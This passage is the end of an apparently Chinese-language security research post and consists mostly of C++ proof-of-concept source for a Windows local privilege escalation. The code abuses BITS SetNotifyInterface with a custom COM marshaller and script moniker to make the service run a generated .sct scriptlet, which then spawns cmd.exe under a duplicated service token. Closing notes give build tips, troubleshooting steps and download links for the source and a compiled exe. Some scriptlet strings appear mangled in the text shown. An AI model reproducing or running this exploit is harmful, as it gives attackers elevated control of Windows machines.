GUID newMonikerGUID = { 0xecabafc6, 0x7f19, 0x11d2, { 0x97, 0x8e, 0x00, 0x00, 0xf8, 0x75, 0x7e, 0x2a } };
pStm->Write(header, 12, &written);
pStm->Write(GuidToByteArray(marshalInterceptorGUID), 16, &written);
pStm->Write(monikers, 4, &written);
pStm->Write(GuidToByteArray(compositeMonikerGUID), 16, &written);
pStm->Write(monikers, 4, &written);
hr = CreateBindCtx(0, &context);
ULONG cchEaten;
//导致最终结果的scriptMoniker
hr = MkParseDisplayName(context, GetExeDirMarshal() + L”\run.sct”, &cchEaten, &scriptMoniker);
//创建复合的moniker
hr = CoCreateInstance(newMonikerGUID, NULL, CLSCTX_ALL, IID_IUnknown, (LPVOID*)&newMoniker);
//写入第一个moniker
hr = OleSaveToStream(scriptMoniker, pStm);
//写入第二个moniker
hr = OleSaveToStream(newMoniker, pStm);
return hr;
}
bstr_t GetExeDirMarshal()
{
WCHAR curr_path[MAX_PATH] = { 0 };
GetModuleFileName(nullptr, curr_path, MAX_PATH);
PathRemoveFileSpec(curr_path);
return curr_path;
}
unsigned char const* GuidToByteArray(GUID const& g)
{
return reinterpret_cast(&g);
}
virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(
/* [annotation][in] */
_In_ REFIID riid,
/* [annotation][unique][in] */
_In_opt_ void *pv,
/* [annotation][in] */
_In_ DWORD dwDestContext,
/* [annotation][unique][in] */
_Reserved_ void *pvDestContext,
/* [annotation][in] */
_In_ DWORD mshlflags,
/* [annotation][out] */
_Out_ DWORD *pSize)
{
*pSize = 1024;
return S_OK;
}
virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(
/* [annotation][unique][in] */
_In_ IStream *pStm,
/* [annotation][in] */
_In_ REFIID riid,
/* [annotation][out] */
_Outptr_ void **ppv)
{
return E_NOTIMPL;
}
virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(
/* [annotation][unique][in] */
_In_ IStream *pStm)
{
return S_OK;
}
virtual HRESULT STDMETHODCALLTYPE DisconnectObject(
/* [annotation][in] */
_In_ DWORD dwReserved)
{
return S_OK;
}
};
class FakeObject : public IBackgroundCopyCallback2, public IPersist
{
HANDLE m_ptoken;
LONG m_lRefCount;
IUnknown *_umk;
~FakeObject() {};
public:
//Constructor, Destructor
FakeObject(IUnknown *umk) {
_umk = umk;
m_lRefCount = 1;
}
//IUnknown
HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)
{
printf(“QI [FakeObject] – Marshaller: %ls %pn”, IIDToBSTR(riid).GetBSTR(), this);
if (riid == __uuidof(IUnknown))
{
printf(“Query for IUnknownn”);
*ppvObj = this;
}
else if (riid == __uuidof(IBackgroundCopyCallback2))
{
printf(“Query for IBackgroundCopyCallback2n”);
}
else if (riid == __uuidof(IBackgroundCopyCallback))
{
printf(“Query for IBackgroundCopyCallbackn”);
}
else if (riid == __uuidof(IPersist))
{
printf(“Query for IPersistn”);
*ppvObj = static_cast(this);
//*ppvObj = _unk2;
}
else if (riid == IID_ITMediaControl)
{
printf(“Query for ITMediaControln”);
*ppvObj = static_cast(this);
//*ppvObj = this;
}
else if (riid == CLSID_AggStdMarshal2)
{
printf(“Query for CLSID_AggStdMarshal2n”);
*ppvObj = (this);
}
else if (riid == IID_IMarshal)
{
printf(“Query for IID_IMarshaln”);
//*ppvObj = static_cast(this);
*ppvObj = NULL;
return E_NOINTERFACE;
}
else if (riid == IID_IMarshalOptions)
{
printf(“PrivateTarProxy IID_IMarshalOptions IID: %ls %pn”, IIDToBSTR(riid).GetBSTR(), this);
ppvObj = NULL;
return E_NOINTERFACE;
}
else
{
printf(“Unknown IID: %ls %pn”, IIDToBSTR(riid).GetBSTR(), this);
*ppvObj = NULL;
return E_NOINTERFACE;
}
((IUnknown *)*ppvObj)->AddRef();
return NOERROR;
}
ULONG __stdcall AddRef()
{
return InterlockedIncrement(&m_lRefCount);
}
ULONG __stdcall Release()
{
ULONG ulCount = InterlockedDecrement(&m_lRefCount);
if (0 == ulCount)
{
delete this;
}
return ulCount;
}
virtual HRESULT STDMETHODCALLTYPE JobTransferred(
/* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob)
{
printf(“JobTransferredn”);
return S_OK;
}
virtual HRESULT STDMETHODCALLTYPE JobError(
/* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
/* [in] */ __RPC__in_opt IBackgroundCopyError *pError)
{
printf(“JobErrorn”);
return S_OK;
}
virtual HRESULT STDMETHODCALLTYPE JobModification(
/* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
/* [in] */ DWORD dwReserved)
{
printf(“JobModificationn”);
return S_OK;
}
virtual HRESULT STDMETHODCALLTYPE FileTransferred(
/* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
/* [in] */ __RPC__in_opt IBackgroundCopyFile *pFile)
{
printf(“FileTransferredn”);
return S_OK;
}
virtual HRESULT STDMETHODCALLTYPE GetClassID(
/* [out] */ __RPC__out CLSID *pClassID)
{
printf(“GetClassIDn”);
*pClassID = GUID_NULL;
return S_OK;
}
};
class ScopedHandle
{
HANDLE _h;
public:
ScopedHandle() : _h(nullptr)
{
}
ScopedHandle(ScopedHandle&) = delete;
ScopedHandle(ScopedHandle&& h) {
_h = h._h;
h._h = nullptr;
}
~ScopedHandle()
{
if (!invalid())
{
CloseHandle(_h);
_h = nullptr;
}
}
bool invalid() {
return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);
}
void set(HANDLE h)
{
_h = h;
}
HANDLE get()
{
return _h;
}
HANDLE* ptr()
{
return &_h;
}
};
_COM_SMARTPTR_TYPEDEF(IEnumBackgroundCopyJobs, __uuidof(IEnumBackgroundCopyJobs));
void TestBits(HANDLE hEvent)
{
IBackgroundCopyManagerPtr pQueueMgr;
IID CLSID_BackgroundCopyManager;
IID IID_IBackgroundCopyManager;
CLSIDFromString(L”{4991d34b-80a1-4291-83b6-3328366b9097}”, &CLSID_BackgroundCopyManager);
CLSIDFromString(L”{5ce34c0d-0dc9-4c1f-897c-daa1b78cee7c}”, &IID_IBackgroundCopyManager);
//会在bit服务中创建对方进程的远程对象IBackgroundCopyManager
HRESULT hr = CoCreateInstance(CLSID_BackgroundCopyManager, NULL,
CLSCTX_ALL, IID_IBackgroundCopyManager, (void**)&pQueueMgr);
//自己构造的s实现IMarshal接口的类
IUnknown * pOuter = new CMarshaller(static_cast(new FakeObject(nullptr)));
IUnknown * pInner;
CoGetStdMarshalEx(pOuter, CLSCTX_INPROC_SERVER, &pInner);
IBackgroundCopyJobPtr pJob;
GUID guidJob;
//先取消所有job
IEnumBackgroundCopyJobsPtr enumjobs;
hr = pQueueMgr->EnumJobsW(0, &enumjobs);
if (SUCCEEDED(hr))
{
IBackgroundCopyJob* currjob;
ULONG fetched = 0;
while ((enumjobs->Next(1, &currjob, &fetched) == S_OK) && (fetched == 1))
{
LPWSTR lpStr;
if (SUCCEEDED(currjob->GetDisplayName(&lpStr)))
{
if (wcscmp(lpStr, L”BitsAuthSample”) == 0)
{
CoTaskMemFree(lpStr);
currjob->Cancel();
currjob->Release();
break;
}
}
currjob->Release();
}
}
//创建job它
pQueueMgr->CreateJob(L”BitsAuthSample”,
BG_JOB_TYPE_DOWNLOAD,
&guidJob,
&pJob);
IUnknownPtr pNotify;
pNotify.Attach(new CMarshaller(pInner));
{
//调用SetNotifyInterface参数我是自定义对象,远程对象继承IMarshal接口
HRESULT hr = pJob->SetNotifyInterface(pNotify);
printf(“Result: %08Xn”, hr);
}
if (pJob)
{
pJob->Cancel();
}
printf(“Donen”);
SetEvent(hEvent);
}
bstr_t GetExeDir()
{
WCHAR curr_path[MAX_PATH] = { 0 };
GetModuleFileName(nullptr, curr_path, MAX_PATH);
PathRemoveFileSpec(curr_path);
return curr_path;
}
void WriteFile(bstr_t path, const std::vector data)
{
ScopedHandle hFile;
hFile.set(CreateFile(path, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, nullptr));
if (hFile.invalid())
{
throw _com_error(E_FAIL);
}
if (data.size() > 0)
{
DWORD bytes_written;
if (!WriteFile(hFile.get(), data.data(), data.size(), &bytes_written, nullptr) || bytes_written != data.size())
{
throw _com_error(E_FAIL);
}
}
}
void WriteFile(bstr_t path, const char* data)
{
const BYTE* bytes = reinterpret_cast(data);
std::vector data_buf(bytes, bytes + strlen(data));
WriteFile(path, data_buf);
}
std::vector ReadFile(bstr_t path)
{
ScopedHandle hFile;
hFile.set(CreateFile(path, GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr));
if (hFile.invalid())
{
throw _com_error(E_FAIL);
}
DWORD size = GetFileSize(hFile.get(), nullptr);
std::vector ret(size);
if (size > 0)
{
DWORD bytes_read;
if (!ReadFile(hFile.get(), ret.data(), size, &bytes_read, nullptr) || bytes_read != size)
{
throw _com_error(E_FAIL);
}
}
return ret;
}
bstr_t GetExe()
{
WCHAR curr_path[MAX_PATH] = { 0 };
GetModuleFileName(nullptr, curr_path, MAX_PATH);
return curr_path;
}
const wchar_t x[] = L”ABC”;
const wchar_t scriptlet_start[] = L”rnrnrnrnrnrnrnrnrnrn”;
bstr_t CreateScriptletFile()
{
//创建sct脚本
bstr_t script_file = GetExeDir() + L”\run.sct”;
DeleteFile(script_file);
bstr_t script_data = scriptlet_start;
bstr_t exe_file = GetExe();
wchar_t* p = exe_file;
while (*p)
{
if (*p == ‘\’)
{
*p = ‘/';
}
p++;
}
DWORD session_id;
ProcessIdToSessionId(GetCurrentProcessId(), &session_id);
WCHAR session_str[16];
StringCchPrintf(session_str, _countof(session_str), L”%d”, session_id);
script_data += L””” + exe_file + L”” ” + session_str + scriptlet_end;
WriteFile(script_file, script_data);
return script_file;
}
void CreateNewProcess(const wchar_t* session)
{
DWORD session_id = wcstoul(session, nullptr, 0);
ScopedHandle token;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token.ptr()))
{
throw _com_error(E_FAIL);
}
ScopedHandle new_token;
if (!DuplicateTokenEx(token.get(), TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, new_token.ptr()))
{
throw _com_error(E_FAIL);
}
SetTokenInformation(new_token.get(), TokenSessionId, &session_id, sizeof(session_id));
STARTUPINFO start_info = {};
start_info.cb = sizeof(start_info);
start_info.lpDesktop = L”WinSta0\Default”;
PROCESS_INFORMATION proc_info;
WCHAR cmdline[] = L”cmd.exe”;
if (CreateProcessAsUser(new_token.get(), nullptr, cmdline,
nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))
{
CloseHandle(proc_info.hProcess);
CloseHandle(proc_info.hThread);
}
}
int _tmain(int argc, _TCHAR* argv[])
{
try
{
CreateScriptletFile();
if (argc > 1)
{
//如果从sct文件调用自身
CreateNewProcess(argv[1]);
}
else
{
HANDLE hTokenTmp = 0;
HANDLE hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
HRESULT hr = 0;
// 初始化com组件安全设置
hr = CoInitialize(NULL);
hr = CoInitializeSecurity(
NULL,
-1,
NULL,
NULL,
RPC_C_AUTHN_LEVEL_CONNECT,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
EOAC_DYNAMIC_CLOAKING | 8,
NULL);
if (FAILED(hr))
{
return false;
}
TestBits(hEvent);
char szInput[64];
scanf_s(“%[a-z0-9]”, szInput);
CloseHandle(hEvent);
}
}
catch (const _com_error& err)
{
printf(“Error: %lsn”, err.ErrorMessage());
}
CoUninitialize();//释放COM
return 0;
}
总结
我的方法对于支持自定义marshal的任意com远程对象适用,请读者自行研究poc源码可在vs2013下编译
如果poc无法运行可能是被其他软件注册了不同的sct脚本打开配置,window的默认配置是在注册表
HKEY_CLASSES_ROOT.sct路径,里面(默认)=scriptletfile,Content Type=text/scriptlet就能正常运行poc,,如果还是不行请运行bitsadmin /reset /allusers命令清除bits服务缓存
备注
如果你对我研究感兴趣,可以联系我邮箱cbwang505@hotmail.com,一起来研究com组件的安全性方面问题
代码托管在https://gitee.com/cbwang505/ComPoc欢迎fork
poc下载地址
https://pan.baidu.com/s/1MS6Qjn4WpLNY_1AP9mpr5A
exe版
https://pan.baidu.com/s/1k4V2ZQfLBgQQ5ggYfzHNVA